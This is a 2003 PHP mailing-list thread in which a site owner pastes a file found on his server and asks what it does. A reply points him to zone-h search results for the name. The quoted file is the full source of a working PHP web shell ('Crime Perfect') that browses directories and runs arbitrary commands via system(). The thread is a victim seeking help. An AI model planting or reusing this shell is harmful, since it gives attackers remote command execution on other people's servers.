Via: http://www.google.ca/search?q=Crime+Perfect+2003&ie=UTF-8&oe=UTF-8&hl=en&meta=
Found: http://www.zone-h.org/ Search: Crime Perfect See: Results (doesn't look good) :-( -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com ----- Original Message ----- From: "Joe Harman" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, July 31, 2003 12:06 AM Subject: [PHP] Possible My Website was hacked... with PHP... please tell me what this is??? > I found this on my server... I have no idea what it is... can someone > tell me what it does... > > > > Thanks > > > > ---------------------------------------------- > > > > <html> <head> > > <title>PHP Shell - CP</title> > > </head> > > <body bgcolor="#FFFFFF" text="#333333" link="#000000" vlink="#000000" > alink="#000000"> > > <h1 align="center"><font size="+4" face="verdana">Crime > Perfect</font><br> > > <font face="Tahoma" size="+1">PHP Shell - by _m4st3r_c0d3</font></h1> > > <?php > > /* First we check if there has been asked for a working directory. */ > > if (isset($work_dir)) { > > /* A workdir has been asked for - we chdir to that dir. */ > > chdir($work_dir); > > $work_dir = exec("pwd"); > > } else { > > /* No work_dir - we chdir to $DOCUMENT_ROOT */ > > chdir($DOCUMENT_ROOT); > > $work_dir = $DOCUMENT_ROOT; > > } > > ?> > > <form name="myform" action="<?php echo $PHP_SELF ?>" method="post"> > > <p><b>Diretório em que você está no momento: > > <?php > > $work_dir_splitted = explode("/", substr($work_dir, 1)); > > echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . > urlencode($command) . "\">Root</a>/"; > > if ($work_dir_splitted[0] == "") { > > $work_dir = "/"; /* Root directory. */ > > } else { > > for ($i = 0; $i < count($work_dir_splitted); $i++) { > > /* echo "i = $i";*/ > > $url .= "/".$work_dir_splitted[$i]; > > echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . > urlencode($command) . "\">$work_dir_splitted[$i]</a>/"; > > } > > } > > ?> > > </b></p> > > <p><b>Escolha abaixo o diretório em que deseja ir:</b></p> > > <select name="work_dir" onChange="this.form.submit()"> > > <?php > > /* Now we make a list of the directories. */ > > $dir_handle = opendir($work_dir); > > /* Run through all the files and directories to find the dirs. */ > > while ($dir = readdir($dir_handle)) { > > if (is_dir($dir)) { > > if ($dir == ".") { > > echo "<option value=\"$work_dir\" selected>Current > Directory</option>\n"; > > } elseif ($dir == "..") { > > /* We have found the parent dir. We must be carefull if the parent > > directory is the root directory (/). */ > > if (strlen($work_dir) == 1) { > > /* work_dir is only 1 charecter - it can only be / */ > > } elseif (strrpos($work_dir, "/") == 0) { > > /* The last / in work_dir were the first charecter. > > This means that we have a top-level directory > > eg. /bin or /home etc... */ > > echo "<option value=\"/\">Parent Directory</option>\n"; > > } else { > > /* We do a little bit of string-manipulation to find the parent > > directory... Trust me - it works :-) */ > > echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), > 1)) ."\">Parent Directory</option>\n"; > > } > > } else { > > if ($work_dir == "/") { > > echo "<option value=\"$work_dir$dir\">$dir</option>\n"; > > } else { > > echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; > > } > > } > > } > > } > > closedir($dir_handle); > > ?> > > </select> > > <p><b>Digite abaixo os comandos que deseja executar:</b></p> > > <input type="text" name="command" size="60" <?php if ($command) { echo > "value=\"$command\"";} ?> > <input name="submit_btn" type="submit" > value="Execute Command"></p> > > <p>Ligar/Ativar <code>stderr</code>-trapping? > > <input type="checkbox" name="stderr"></p> > > <p><b>Abaixo, terminal onde aparecerá os resultados dos comandos > que > > você executou</b></p> > > <p> > > <textarea cols="80" rows="20" readonly> > > <?php > > if ($command) { > > if ($stderr) { > > system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm > /tmp/output.txt"); > > } else { > > system($command); > > } > > } > > ?> > > </textarea> > > </p> > > </form> > > > > <p><b>Crime Perfect 2003 </b></p> > > <p><b>By _m4st3r_c0d3 - #crimeperfect</b></p> > > </div> > > </body> > > </html> > > > > > Joe Harman > > http://www.HarmanMedia.com > > Only two things are infinite, the universe and human stupidity, and I'm > not sure about the former. - Albert Einstein > > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
